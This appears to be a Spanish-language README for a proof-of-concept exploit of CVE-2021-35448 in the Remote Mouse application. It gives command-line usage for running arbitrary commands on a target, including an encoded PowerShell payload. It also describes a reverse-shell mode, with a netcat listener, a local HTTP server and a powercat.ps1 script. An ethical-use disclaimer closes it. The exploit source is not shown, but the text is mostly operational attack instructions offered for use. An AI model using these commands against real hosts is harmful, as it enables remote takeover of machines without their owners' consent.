
POC para CVE-2021-35448 basado en https://www.exploit-db.com/exploits/49601
Este exploit apunta a la vulnerabilidad CVE-2021-35448 en la aplicación Remote Mouse (anteriormente WiFi Mouse).
python3 CVE-2021-35448.py -t <TARGET_IP> [OPTIONS]
-t, --target: Dirección IP del objetivo (obligatorio)-p, --payload: Comando personalizado a ejecutar-r, --reverse: Reverse shell en formato IP:PUERTO-l, --http: Servidor HTTP local en formato IP:PUERTO (obligatorio con -r)python3 CVE-2021-35448.py -t 192.168.1.100 -p "Powershell -e JAB...=="
# Terminal 1 - Listener
nc -nlvp 4444
# Terminal 2 - Exploit
python3 CVE-2021-35448.py -t $REMOTESERVER_IP -r $REVSHELL_IP:$PORT -l 0.0.0.0:$PORT
CVE-2021-35448.py: Script principal de explotaciónpowercat.ps1: Script de PowerShell para reverse shells⚠️ SOLO USO ÉTICO ⚠️
Esta herramienta está destinada únicamente a fines educativos y pruebas de penetración autorizadas. El uso no autorizado de este exploit es ilegal y puede resultar en acciones legales.
Desarrollado con fines educativos y de pruebas de penetración éticas.
Última actualización: 2025